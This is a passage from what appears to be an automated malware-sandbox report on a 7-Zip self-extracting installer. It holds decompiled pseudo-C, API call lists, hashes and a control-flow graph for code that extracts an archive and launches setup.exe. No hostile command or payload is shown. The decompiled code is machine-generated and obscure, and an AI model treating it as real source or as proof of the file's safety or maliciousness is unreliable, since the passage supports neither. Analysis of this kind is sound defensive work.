                              											E00403A9C(_v44);
                              											E00403A9C(_v68);
                              											goto L69;
                              										} else {
                              											__eflags = _a7;
                              											if(_a7 == 0) {
                              												__eflags = 0;
                              												E00411093(0, L"Can not open file");
                              											}
                              											E00403A9C(_v44);
                              											E00403A9C(_v68);
                              											goto L63;
                              										}
                              									}
                              									SetCurrentDirectoryA(_v128);
                              									E00403A9C(_v128);
                              									E00403A9C(_v200);
                              									goto L43;
                              								}
                              								__eflags = _a7;
                              								if(_a7 != 0) {
                              									L40:
                              									_push(_v44);
                              									goto L65;
                              								}
                              								__eflags = _t314 - 1;
                              								if(_t314 == 1) {
                              									L36:
                              									_t619 = 8;
                              									E00401D7A( &_v44, E0040602F(_t619));
                              									E00403A9C(_v188);
                              									_t314 = 0x80004005;
                              									L37:
                              									__eflags = _t314 - 0x80004004;
                              									if(_t314 != 0x80004004) {
                              										__eflags = _v40;
                              										if(_v40 != 0) {
                              											_t620 = 7;
                              											MessageBoxW(0, _v44,  *(E0040602F(_t620)), 0x10);
                              											E00403A9C(_v188);
                              										}
                              									}
                              									goto L40;
                              								}
                              								__eflags = _v5;
                              								if(_v5 == 0) {
                              									goto L37;
                              								}
                              								goto L36;
                              							} else {
                              								E00411093(0, L"Can not load codecs");
                              								L43:
                              								__eflags = _t636;
                              								if(_t636 != 0) {
                              									 *((intOrPtr*)( *_t636 + 8))(_t636);
                              								}
                              								L24:
                              								_push(1);
                              								_pop(0);
                              								L73:
                              								E00401A2D( &_v144);
                              								E00403A9C(_v140);
                              								E00403A9C(_v56);
                              								E00403A9C(_v212);
                              								_t644 =  &(_t644[3]);
                              								goto L74;
                              							}
                              						}
                              						__eflags = _a7;
                              						if(_a7 == 0) {
                              							__eflags = 0;
                              							E00411093(0, L"Can not create temp folder archive");
                              						}
                              						goto L24;
                              					}
                              					E00402155( &_v176);
                              					_v176 = 0x41b334;
                              					_t423 = E00403D5A( &_v92,  &_v176);
                              					__eflags = _t423;
                              					if(_t423 != 0) {
                              						E00401C80( &_v20, L"Title");
                              						E00404073( &_v68,  &_v176,  &_v20);
                              						E00403A9C(_v20);
                              						 *_t644 = L"BeginPrompt";
                              						E00401C80( &_v20);
                              						E00404073( &_v44,  &_v176,  &_v20);
                              						E00403A9C(_v20);
                              						 *_t644 = L"Progress";
                              						E00401C80( &_v20);
                              						E00404073( &_v228,  &_v176,  &_v20);
                              						E00403A9C(_v20);
                              						_t436 = E00403B4F(L"no");
                              						__eflags = _t436;
                              						if(_t436 == 0) {
                              							_v216 = 0;
                              						}
                              						E00401C80( &_v20, L"Directory");
                              						_t642 = E00404041( &_v176,  &_v20);
                              						E00403A9C(_v20);
                              						__eflags = _t642;
                              						if(_t642 >= 0) {
                              							__eflags =  *((intOrPtr*)(_v164 + _t642 * 4)) + 0xc;
                              							E00401D7A( &_v212,  *((intOrPtr*)(_v164 + _t642 * 4)) + 0xc);
                              						}
                              						__eflags = _v40;
                              						if(_v40 == 0) {
                              							L20:
                              							E00401C80( &_v20, L"RunProgram");
                              							E00401D7A( &_v56, E00404073( &(_v244.hThread),  &_v176,  &_v20));
                              							E00403A9C(_v244.hThread);
                              							E00403A9C(_v20);
                              							E00401C80( &_v20, L"ExecuteFile");
                              							E00401D7A( &_v80, E00404073( &(_v244.hThread),  &_v176,  &_v20));
                              							E00403A9C(_v244.hThread);
                              							E00403A9C(_v20);
                              							E00401C80( &_v20, L"ExecuteParameters");
                              							_push( &_v32);
                              							E00401D7A( &_v116, E00402634( &(_v244.hThread), E00404073( &_v188,  &_v176,  &_v20)));
                              							E00403A9C(_v244.hThread);
                              							E00403A9C(_v188);
                              							E00403A9C(_v20);
                              							E00403A9C(_v228);
                              							E00403A9C(_v44);
                              							E00403A9C(_v68);
                              							_t644 =  &(_t644[6]);
                              							_v176 = 0x41b334;
                              							E004042D6();
                              							E004042AD( &_v176);
                              							goto L21;
                              						} else {
                              							__eflags = _a7;
                              							if(_a7 != 0) {
                              								goto L20;
                              							}
                              							_t466 = MessageBoxW(0, _v44, _v68, 0x24);
                              							__eflags = _t466 - 6;
                              							if(_t466 == 6) {
                              								goto L20;
                              							}
                              							E00403A9C(_v228);
                              							E00403A9C(_v44);
                              							E00403A9C(_v68);
                              							_t644 =  &(_t644[3]);
                              							L19:
                              							_v176 = 0x41b334;
                              							E004042D6();
                              							E004042AD( &_v176);
                              							E00403A9C(_v56);
                              							E00403A9C(_v212);
                              							E00403A9C(_v92);
                              							E00403A9C(_v104);
                              							E00403A9C(_v116);
                              							E00403A9C(_v80);
                              							E00403A9C(_v32);
                              							E00403A9C(_v156);
                              							goto L75;
                              						}
                              					}
                              					__eflags = _a7;
                              					if(_a7 == 0) {
                              						__eflags = 0;
                              						E00411093(0, L"Config failed");
                              					}
                              					_push(1);
                              					_pop(0);
                              					goto L19;
                              				} else {
                              					if(_a7 == 0) {
                              						E00411093(0, L"Can\'t load config info");
                              					}
                              					_push(1);
                              					_pop(0);
                              					L74:
                              					E00403A9C(_v92);
                              					E00403A9C(_v104);
                              					E00403A9C(_v116);
                              					E00403A9C(_v80);
                              					E00403A9C(_v32);
                              					E00403A9C(_v156);
                              					L75:
                              					return 0;
                              				}
                              			}

                              [Disassembly view residue: only the instruction-address column survived extraction (0x00401023 through 0x004019fa, with 0x00000000 entries at block boundaries); the instruction text itself is not present in the captured page.]

                              APIs
                                • Part of subcall function 00401A51: GetVersionExA.KERNEL32(?), ref: 00401A6B
                              • GetCommandLineW.KERNEL32(00000003,00000003,00000003,00000003,?,00000000), ref: 0040108B
                                • Part of subcall function 004038EE: __EH_prolog.LIBCMT ref: 004038F3
                                • Part of subcall function 004045E2: __EH_prolog.LIBCMT ref: 004045E7
                                • Part of subcall function 004045E2: GetModuleFileNameW.KERNEL32(?,?,00000105,00000003,00000000,00000000), ref: 00404618
                                • Part of subcall function 0040235E: __EH_prolog.LIBCMT ref: 00402363
                                • Part of subcall function 00402323: __EH_prolog.LIBCMT ref: 00402328
                                • Part of subcall function 00403D5A: __EH_prolog.LIBCMT ref: 00403D5F
                              • MessageBoxW.USER32(00000000,?,?,00000010), ref: 004015DF
                              • SetCurrentDirectoryA.KERNELBASE(?,?,00000001,?,?,00000003,00000003,0042023C,;!@InstallEnd@!,?,00000003,00000000,00000002,00420274,00000003,?), ref: 0040161E
                              • SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 00401627
                              • ShellExecuteExA.SHELL32(0000003C,?,00000000), ref: 004016D7
                              • MessageBoxW.USER32(00000000,?,?,00000024), ref: 00401306
                                • Part of subcall function 00411093: MessageBoxW.USER32(00000000,?,7-Zip,00000010), ref: 0041109C
                                • Part of subcall function 00402F15: __EH_prolog.LIBCMT ref: 00402F1A
                              • SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 004018B2
                              • CloseHandle.KERNEL32(?,?,00000000), ref: 00401940
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00401965
                              • CloseHandle.KERNEL32(?,?,00000000), ref: 0040196E
                              • SetCurrentDirectoryA.KERNELBASE(?,?,00000000), ref: 00401977
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$CurrentDirectory$Message$CloseHandle$CommandExecuteFileLineModuleNameObjectShellSingleVersionWait
                              • String ID: $%%T$%%T\$;!@Install@!UTF-8!$;!@InstallEnd@!$<$> @$Can not create temp folder archive$Can not find setup.exe$Can not load codecs$Can not open file$Can't load config info$Config failed$D$Directory$ExecuteFile$ExecuteParameters$RunProgram$Title$setup.exe
                              • API String ID: 2760820266-829806607
                              • Opcode ID: 2ae731fc3f4a3823738156fd9143628e005fdebe6c7a76c6afd666806b1dc003
                              • Instruction ID: 30a6e78c0a87ce65c61bf6c489231b06ab30573cf11c386798d37ebdc1e5dfdc
                              • Opcode Fuzzy Hash: 2ae731fc3f4a3823738156fd9143628e005fdebe6c7a76c6afd666806b1dc003
                              • Instruction Fuzzy Hash: 57524971D002199ADF21EFA1DC85AEEBB75BF04318F1040BFE149761A2DB395A85CF58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 372 40ad19-40ad3d call 413954 call 40d7cc 377 40ad43-40ad79 call 402155 call 413310 call 40640d 372->377 378 40b2d7-40b2dc 372->378 386 40ae60-40ae97 call 40acc4 call 40b99b call 40b63c 377->386 387 40ad7f 377->387 379 40b605-40b613 378->379 402 40aeb6-40aec6 call 4042d6 386->402 403 40ae99-40aeb0 call 40b753 386->403 389 40ad82-40ad8c call 403a76 387->389 394 40ad9c 389->394 395 40ad8e-40ad9a 389->395 398 40ad9e-40ada3 394->398 395->398 400 40ada5-40ada7 398->400 401 40adab-40add6 call 403a76 398->401 400->401 410 40add8-40ade8 401->410 411 40adea 401->411 413 40aed1-40aed5 402->413 414 40aec8-40aece 402->414 403->402 412 40b071-40b087 403->412 415 40adec-40adf1 410->415 411->415 425 40b08d-40b090 412->425 426 40b4bf-40b4e1 call 40a402 412->426 416 40aed7-40aeeb call 403a76 413->416 417 40af18-40af2a 413->417 414->413 418 40adf3-40adf5 415->418 419 40adf9-40ae32 call 40640d call 40a5e4 415->419 434 40aef6 416->434 435 40aeed-40aef4 call 40b860 416->435 432 40af73-40af79 417->432 433 40af2c-40af6e call 4042ad call 4099bc DeleteCriticalSection call 403800 417->433 418->419 447 40ae34-40ae36 419->447 448 40ae3a-40ae40 419->448 431 40b093-40b0c8 425->431 444 40b4e3-40b4e9 426->444 445 40b4ec-40b4ef 426->445 460 40b0f3-40b0f9 431->460 461 40b0ca-40b0d3 431->461 440 40b05f-40b06e call 40b96f 432->440 441 40af7f-40afac call 4063bd 432->441 504 40b535-40b549 call 4042d6 call 4042ad 433->504 439 40aef8-40af0c call 40640d 434->439 435->439 468 40af13 439->468 469 40af0e-40af11 439->469 440->412 470 40afb2-40afbd 441->470 471 40b197-40b1a0 441->471 444->445 453 40b4f1-40b533 call 4042ad call 4099bc DeleteCriticalSection call 403800 445->453 454 40b54e-40b57e call 4032a8 call 404327 445->454 447->448 458 40ae42-40ae44 448->458 459 40ae48-40ae57 448->459 453->504 518 40b580-40b597 call 4039df 454->518 519 40b599-40b5b9 call 409cc8 454->519 458->459 459->389 472 40ae5d 459->472 465 40b101-40b149 call 4032a8 * 2 call 404327 * 2 460->465 466 40b0fb-40b0fd 460->466 473 40b382-40b388 461->473 474 40b0d9-40b0ea 461->474 575 40b163-40b169 465->575 576 40b14b-40b161 call 4039df 465->576 466->465 477 40af15 468->477 469->477 480 40afeb-40afef 470->480 481 40afbf-40afc3 470->481 482 40b1a2-40b1a4 471->482 483 40b1a8-40b1b1 471->483 472->386 484 40b390-40b3d7 call 4042ad call 4099bc DeleteCriticalSection call 403800 473->484 485 40b38a-40b38c 473->485 497 40b0f0 474->497 498 40b3d9-40b3e2 474->498 477->417 486 40b270-40b279 480->486 487 40aff5-40b004 call 40640d 480->487 481->480 492 40afc5-40afca 481->492 482->483 493 40b1b3-40b1b5 483->493 494 40b1b9-40b1fd call 4042ad call 4099bc DeleteCriticalSection call 403800 483->494 560 40b42c-40b442 call 4042d6 call 4042ad 484->560 485->484 502 40b281-40b2d2 call 4042ad call 4099bc DeleteCriticalSection call 403800 call 4042d6 call 4042ad 486->502 503 40b27b-40b27d 486->503 525 40b011-40b026 call 40bab0 487->525 526 40b006-40b00c call 40a0de 487->526 506 40afd0-40afdc call 40640d 492->506 507 40b202-40b20b 492->507 493->494 494->504 497->460 510 40b3e4-40b3e6 498->510 511 40b3ea-40b425 call 4042ad call 4099bc DeleteCriticalSection call 403800 498->511 502->378 503->502 567 40b603 504->567 506->525 548 40afde-40afe9 call 40a0b9 506->548 513 40b216-40b21c 507->513 514 40b20d-40b213 507->514 510->511 511->560 528 40b224-40b26b call 4042ad call 4099bc DeleteCriticalSection call 403800 513->528 529 40b21e-40b220 513->529 514->513 518->519 547 40b5bc-40b5fe call 4042ad * 2 call 4099bc call 40b845 call 40a5ac 519->547 563 40b028-40b02a 525->563 564 40b02e-40b037 525->564 526->525 528->504 529->528 547->567 548->525 560->379 563->564 573 40b039-40b03b 564->573 574 40b03f-40b048 564->574 567->379 573->574 583 40b050-40b059 574->583 584 40b04a-40b04c 574->584 586 40b33a-40b36e call 4042ad * 2 575->586 587 40b16f 575->587 576->575 583->440 583->441 584->583 586->431 627 40b374-40b379 586->627 593 40b172-40b179 587->593 599 40b2e5 593->599 600 40b17f 593->600 603 40b2e8-40b2ea 599->603 605 40b182-40b184 600->605 607 40b2f8-40b2ff 603->607 608 40b2ec-40b2f6 603->608 610 40b2e1-40b2e3 605->610 611 40b18a-40b190 605->611 614 40b310 607->614 615 40b301 607->615 613 40b31e-40b334 call 4039df 608->613 610->603 611->605 617 40b192 611->617 613->586 613->593 619 40b313-40b315 614->619 618 40b304-40b306 615->618 617->599 622 40b308-40b30e 618->622 623 40b37e-40b380 618->623 624 40b447-40b4ba call 4042ad * 3 call 4099bc DeleteCriticalSection call 403800 call 4042d6 call 4042ad 619->624 625 40b31b 619->625 622->614 622->618 623->619 624->379 625->613 627->426
                              C-Code - Quality: 90%
                              			E0040AD19(char* __ecx, void* __eflags) {
                              				signed int _t373;
                              				signed int _t382;
                              				intOrPtr* _t417;
                              				signed int _t419;
                              				signed int _t423;
                              				signed int _t429;
                              				signed int _t430;
                              				intOrPtr* _t440;
                              				intOrPtr* _t441;
                              				signed int _t453;
                              				signed int _t462;
                              				signed int _t463;
                              				signed int _t464;
                              				signed int _t471;
                              				signed int _t482;
                              				signed int _t483;
                              				signed int _t484;
                              				signed int _t490;
                              				signed int _t504;
                              				signed int _t505;
                              				intOrPtr _t507;
                              				signed int _t508;
                              				signed char _t510;
                              				char _t512;
                              				intOrPtr* _t513;
                              				signed int _t518;
                              				signed int _t523;
                              				signed int _t535;
                              				signed int _t537;
                              				signed int _t538;
                              				signed int _t539;
                              				intOrPtr* _t540;
                              				signed int _t580;
                              				signed int _t581;
                              				intOrPtr _t589;
                              				signed int _t595;
                              				signed int _t626;
                              				signed int _t652;
                              				signed int _t653;
                              				char* _t658;
                              				signed int _t660;
                              				signed int _t661;
                              				intOrPtr* _t662;
                              				signed int _t664;
                              				signed int* _t667;
                              				signed int _t668;
                              				signed int _t669;
                              				signed int _t670;
                              				intOrPtr _t671;
                              				signed int _t672;
                              				signed int _t673;
                              				signed int _t674;
                              				intOrPtr _t675;
                              				intOrPtr* _t676;
                              				signed int _t677;
                              				void* _t678;
                              
                              				E00413954(E0041A132, _t678);
                              				_t664 =  *(_t678 + 0x18);
                              				_t658 = __ecx;
                              				 *((intOrPtr*)(_t678 - 0x30)) = __ecx;
                              				if(E0040D7CC(_t664) == 0) {
                              					L81:
                              					_t373 = 0x80004001;
                              					L114:
                              					 *[fs:0x0] =  *((intOrPtr*)(_t678 - 0xc));
                              					return _t373;
                              				}
                              				E00402155(_t678 - 0x2c);
                              				 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              				 *(_t678 - 4) = 0;
                              				 *((intOrPtr*)(_t678 - 0x50)) = 0;
                              				E00413310(_t678 - 0x4c);
                              				 *(_t678 - 4) = 1;
                              				E0040640D(_t678 - 0x50,  *(_t678 + 8));
                              				 *(_t678 + 8) = 0;
                              				if( *((intOrPtr*)(_t664 + 0x30)) <= 0) {
                              					L19:
                              					_t535 =  *( *(_t678 + 0x18) + 8);
                              					 *(_t678 - 0x18) = _t535;
                              					E0040ACC4(_t678 - 0xf8);
                              					 *(_t678 - 4) = 4;
                              					E0040B99B(_t678 - 0xa8);
                              					 *(_t678 - 4) = 5;
                              					E0040B63C( *(_t678 + 0x18), _t678 - 0xf8);
                              					if( *_t658 == 0) {
                              						L21:
                              						E004042D6();
                              						_t382 =  *(_t658 + 0x74);
                              						_t667 = _t658 + 0x74;
                              						if(_t382 != 0) {
                              							 *((intOrPtr*)( *_t382 + 8))(_t382);
                              							 *_t667 =  *_t667 & 0x00000000;
                              						}
                              						if( *((char*)(_t658 + 0x68)) != 0) {
                              							_push(0x88);
                              							_t504 = E00403A76();
                              							 *(_t678 + 8) = _t504;
                              							 *(_t678 - 4) = 6;
                              							if(_t504 == 0) {
                              								_t505 = 0;
                              								__eflags = 0;
                              							} else {
                              								_t505 = E0040B860(_t504);
                              							}
                              							 *(_t678 - 4) = 5;
                              							 *((intOrPtr*)(_t658 + 0x6c)) = _t505;
                              							E0040640D(_t667, _t505);
                              							_t507 =  *((intOrPtr*)(_t658 + 0x6c));
                              							if(_t507 == 0) {
                              								_t508 = 0;
                              								__eflags = 0;
                              							} else {
                              								_t508 = _t507 + 4;
                              							}
                              							 *((intOrPtr*)(_t658 + 0x70)) = _t508;
                              						}
                              						_t668 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x70))))))(_t678 - 0xf8);
                              						_t700 = _t668;
                              						if(_t668 == 0) {
                              							 *(_t678 - 0x10) =  *(_t678 - 0x10) & 0x00000000;
                              							__eflags = _t535;
                              							if(__eflags <= 0) {
                              								L50:
                              								E0040B96F(_t658 + 4, __eflags, _t678 - 0xf8);
                              								 *_t658 = 1;
                              								L51:
                              								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x70)))) + 4))();
                              								_t669 = 0;
                              								__eflags =  *(_t678 - 0x18);
                              								 *((intOrPtr*)(_t678 - 0x34)) = 0;
                              								 *(_t678 + 0x10) = 0;
                              								 *(_t678 - 0x14) = 0;
                              								if( *(_t678 - 0x18) <= 0) {
                              									L105:
                              									E0040A402(_t678 - 0xf8,  *((intOrPtr*)( *((intOrPtr*)(_t678 - 0xb0)))), _t678 - 0x58, _t678 - 0xfc);
                              									__eflags =  *((char*)(_t658 + 0x68));
                              									if( *((char*)(_t658 + 0x68)) != 0) {
                              										 *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x6c)) + 0x70)) =  *((intOrPtr*)(_t678 - 0x58));
                              									}
                              									__eflags =  *(_t678 - 0x18) - _t669;
                              									if( *(_t678 - 0x18) != _t669) {
                              										E004032A8(_t678 - 0x94, 4);
                              										 *((intOrPtr*)(_t678 - 0x94)) = 0x41b6b8;
                              										 *(_t678 - 4) = 0x1d;
                              										E00404327(_t678 - 0x94,  *(_t678 - 0x24));
                              										_t670 = 0;
                              										__eflags =  *(_t678 - 0x24);
                              										if( *(_t678 - 0x24) <= 0) {
                              											L112:
                              											_t660 =  *(_t658 + 0x74);
                              											 *((intOrPtr*)(_t678 - 0x54)) =  *((intOrPtr*)(_t678 + 0x1c));
                              											_t668 =  *((intOrPtr*)( *_t660 + 0xc))(_t660,  *((intOrPtr*)(_t678 - 0x88)), 0,  *(_t678 - 0x24), _t678 - 0x54, 0, 1,  *((intOrPtr*)(_t678 + 0x20)));
                              											 *(_t678 - 4) = 5;
                              											E004042AD(_t678 - 0x94);
                              											 *(_t678 - 4) = 0x1e;
                              											E004042AD(_t678 - 0xa8);
                              											 *(_t678 - 4) = 1;
                              											E004099BC(_t678 - 0xf8, __eflags);
                              											 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              											E0040B845(_t678 - 0x50);
                              											_t366 = _t678 - 4;
                              											 *_t366 =  *(_t678 - 4) | 0xffffffff;
                              											__eflags =  *_t366;
                              											E0040A5AC(_t678 - 0x2c);
                              											goto L113;
                              										} else {
                              											goto L111;
                              										}
                              										do {
                              											L111:
                              											E004039DF(_t678 - 0x94,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x20)) + _t670 * 4)))));
                              											_t670 = _t670 + 1;
                              											__eflags = _t670 -  *(_t678 - 0x24);
                              										} while (_t670 <  *(_t678 - 0x24));
                              										goto L112;
                              									} else {
                              										 *(_t678 - 4) = 0x1b;
                              										E004042AD(_t678 - 0xa8);
                              										 *(_t678 - 4) = 1;
                              										E004099BC(_t678 - 0xf8, __eflags);
                              										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              										DeleteCriticalSection(_t678 - 0x4c);
                              										E00403800(_t678 - 0x50);
                              										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              										 *(_t678 - 4) = 0x1c;
                              										_t668 = 0;
                              										__eflags = 0;
                              										goto L109;
                              									}
                              								}
                              								_t661 =  *(_t678 + 0x18);
                              								 *(_t678 + 8) = 0;
                              								do {
                              									 *(_t678 + 0x18) =  *(_t678 + 0x18) & 0x00000000;
                              									_t671 =  *((intOrPtr*)( *((intOrPtr*)(_t661 + 0xc)) +  *(_t678 - 0x14) * 4));
                              									_t417 =  *((intOrPtr*)( *((intOrPtr*)( *(_t678 + 8) +  *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x30)) + 0x84))))));
                              									 *(_t678 - 4) = 0x12;
                              									 *((intOrPtr*)( *_t417))(_t417, 0x41b298, _t678 + 0x18);
                              									_t419 =  *(_t678 + 0x18);
                              									__eflags = _t419;
                              									if(_t419 == 0) {
                              										L57:
                              										__eflags = _t419;
                              										 *(_t678 - 4) = 5;
                              										if(_t419 != 0) {
                              											 *((intOrPtr*)( *_t419 + 8))(_t419);
                              										}
                              										_t537 =  *(_t671 + 0x14);
                              										 *(_t678 + 8) =  *(_t678 + 8) + 4;
                              										_t672 =  *(_t671 + 0x18);
                              										E004032A8(_t678 - 0x6c, 4);
                              										 *((intOrPtr*)(_t678 - 0x6c)) = 0x41b68c;
                              										 *(_t678 - 4) = 0x17;
                              										E004032A8(_t678 - 0x80, 4);
                              										 *((intOrPtr*)(_t678 - 0x80)) = 0x41b68c;
                              										 *(_t678 - 4) = 0x18;
                              										E00404327(_t678 - 0x6c, _t537);
                              										_t423 = E00404327(_t678 - 0x80, _t672);
                              										__eflags = _t672;
                              										if(_t672 <= 0) {
                              											L61:
                              											 *(_t678 - 0x10) =  *(_t678 - 0x10) & 0x00000000;
                              											__eflags = _t537;
                              											if(_t537 <= 0) {
                              												goto L94;
                              											}
                              											_t675 =  *((intOrPtr*)(_t678 - 0x34));
                              											do {
                              												_t580 =  *(_t661 + 0x1c);
                              												_t652 = 0;
                              												__eflags = _t580;
                              												if(_t580 <= 0) {
                              													L83:
                              													_t429 = _t423 | 0xffffffff;
                              													__eflags = _t429;
                              													L84:
                              													__eflags = _t429;
                              													if(_t429 < 0) {
                              														_t581 =  *(_t661 + 0x30);
                              														_t653 = 0;
                              														__eflags = _t581;
                              														if(_t581 <= 0) {
                              															L90:
                              															_t430 = _t429 | 0xffffffff;
                              															__eflags = _t430;
                              															L91:
                              															__eflags = _t430;
                              															if(_t430 < 0) {
                              																 *(_t678 - 4) = 0x17;
                              																E004042AD(_t678 - 0x80);
                              																 *(_t678 - 4) = 5;
                              																E004042AD(_t678 - 0x6c);
                              																 *(_t678 - 4) = 0x19;
                              																E004042AD(_t678 - 0xa8);
                              																 *(_t678 - 4) = 1;
                              																E004099BC(_t678 - 0xf8, __eflags);
                              																 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              																DeleteCriticalSection(_t678 - 0x4c);
                              																E00403800(_t678 - 0x50);
                              																 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              																 *(_t678 - 4) = 0x1a;
                              																E004042D6();
                              																 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
                              																E004042AD(_t678 - 0x2c);
                              																_t373 = 0x80004005;
                              																goto L114;
                              															}
                              															_t589 =  *((intOrPtr*)(_t678 + 0x14));
                              															goto L93;
                              														}
                              														_t441 =  *((intOrPtr*)(_t661 + 0x34));
                              														while(1) {
                              															__eflags =  *_t441 - _t675;
                              															if( *_t441 == _t675) {
                              																break;
                              															}
                              															_t653 = _t653 + 1;
                              															_t441 = _t441 + 4;
                              															__eflags = _t653 - _t581;
                              															if(_t653 < _t581) {
                              																continue;
                              															}
                              															goto L90;
                              														}
                              														_t430 = _t653;
                              														goto L91;
                              													}
                              													_t430 =  *( *((intOrPtr*)(_t661 + 0x20)) + 4 + _t429 * 8);
                              													_t589 =  *((intOrPtr*)(_t661 + 0x48));
                              													goto L93;
                              												}
                              												_t440 =  *((intOrPtr*)(_t661 + 0x20));
                              												while(1) {
                              													__eflags =  *_t440 - _t675;
                              													if( *_t440 == _t675) {
                              														break;
                              													}
                              													_t652 = _t652 + 1;
                              													_t440 = _t440 + 8;
                              													__eflags = _t652 - _t580;
                              													if(_t652 < _t580) {
                              														continue;
                              													}
                              													goto L83;
                              												}
                              												_t429 = _t652;
                              												goto L84;
                              												L93:
                              												_t423 = E004039DF(_t678 - 0x6c, _t589 + _t430 * 8);
                              												 *(_t678 - 0x10) =  *(_t678 - 0x10) + 1;
                              												_t675 = _t675 + 1;
                              												__eflags =  *(_t678 - 0x10) - _t537;
                              												 *((intOrPtr*)(_t678 - 0x34)) = _t675;
                              											} while ( *(_t678 - 0x10) < _t537);
                              											goto L94;
                              										} else {
                              											do {
                              												_t423 = E004039DF(_t678 - 0x80,  *((intOrPtr*)(_t661 + 0x48)) +  *(_t678 + 0x10) * 8);
                              												 *(_t678 + 0x10) =  *(_t678 + 0x10) + 1;
                              												_t672 = _t672 - 1;
                              												__eflags = _t672;
                              											} while (_t672 != 0);
                              											goto L61;
                              										}
                              									}
                              									_t595 =  *(_t671 + 0xc);
                              									__eflags = _t595 - 0xffffffff;
                              									 *(_t678 - 0x10) = _t595;
                              									if(_t595 > 0xffffffff) {
                              										__eflags = _t419;
                              										 *(_t678 - 4) = 5;
                              										if(_t419 != 0) {
                              											 *((intOrPtr*)( *_t419 + 8))(_t419);
                              										}
                              										 *(_t678 - 4) = 0x13;
                              										E004042AD(_t678 - 0xa8);
                              										 *(_t678 - 4) = 1;
                              										E004099BC(_t678 - 0xf8, __eflags);
                              										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              										DeleteCriticalSection(_t678 - 0x4c);
                              										E00403800(_t678 - 0x50);
                              										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              										 *(_t678 - 4) = 0x14;
                              										_t538 = 0x80004001;
                              										L103:
                              										E004042D6();
                              										 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
                              										E004042AD(_t678 - 0x2c);
                              										_t373 = _t538;
                              										goto L114;
                              									}
                              									_t538 =  *((intOrPtr*)( *_t419 + 0xc))(_t419,  *((intOrPtr*)(_t671 + 0x10)),  *(_t678 - 0x10));
                              									__eflags = _t538;
                              									if(_t538 != 0) {
                              										_t453 =  *(_t678 + 0x18);
                              										 *(_t678 - 4) = 5;
                              										__eflags = _t453;
                              										if(_t453 != 0) {
                              											 *((intOrPtr*)( *_t453 + 8))(_t453);
                              										}
                              										 *(_t678 - 4) = 0x15;
                              										E004042AD(_t678 - 0xa8);
                              										 *(_t678 - 4) = 1;
                              										E004099BC(_t678 - 0xf8, __eflags);
                              										_t287 = _t678 - 4;
                              										 *_t287 =  *(_t678 - 4) & 0x00000000;
                              										__eflags =  *_t287;
                              										DeleteCriticalSection(_t678 - 0x4c);
                              										E00403800(_t678 - 0x50);
                              										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              										 *(_t678 - 4) = 0x16;
                              										goto L103;
                              									}
                              									_t419 =  *(_t678 + 0x18);
                              									goto L57;
                              									L94:
                              									_t673 =  *(_t678 - 0x14);
                              									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x30)) + 0x70)))) + 8))(_t673,  *((intOrPtr*)(_t678 - 0x60)),  *((intOrPtr*)(_t678 - 0x74)));
                              									 *(_t678 - 4) = 0x17;
                              									E004042AD(_t678 - 0x80);
                              									 *(_t678 - 4) = 5;
                              									E004042AD(_t678 - 0x6c);
                              									_t674 = _t673 + 1;
                              									__eflags = _t674 -  *(_t678 - 0x18);
                              									 *(_t678 - 0x14) = _t674;
                              								} while (_t674 <  *(_t678 - 0x18));
                              								_t658 =  *((intOrPtr*)(_t678 - 0x30));
                              								_t669 = 0;
                              								goto L105;
                              							} else {
                              								goto L34;
                              							}
                              							while(1) {
                              								L34:
                              								_t676 =  *((intOrPtr*)( *((intOrPtr*)( *(_t678 + 0x18) + 0xc)) +  *(_t678 - 0x10) * 4));
                              								 *(_t678 + 0x10) = 0;
                              								 *(_t678 + 8) = 0;
                              								_push(0);
                              								_push( *((intOrPtr*)(_t676 + 4)));
                              								 *(_t678 - 4) = 0xa;
                              								_push( *_t676);
                              								_t462 = E004063BD(_t678 + 0x10, _t678 + 8, __eflags);
                              								_t539 = _t462;
                              								__eflags = _t539;
                              								if(_t539 != 0) {
                              									break;
                              								}
                              								 *(_t678 - 0x14) =  *(_t678 - 0x14) & _t462;
                              								__eflags =  *((intOrPtr*)(_t676 + 0x14)) - 1;
                              								 *(_t678 - 4) = 0xd;
                              								if( *((intOrPtr*)(_t676 + 0x14)) != 1) {
                              									L40:
                              									__eflags =  *(_t678 + 8);
                              									if( *(_t678 + 8) == 0) {
                              										_t471 =  *(_t678 + 0x10);
                              										 *(_t678 - 4) = 5;
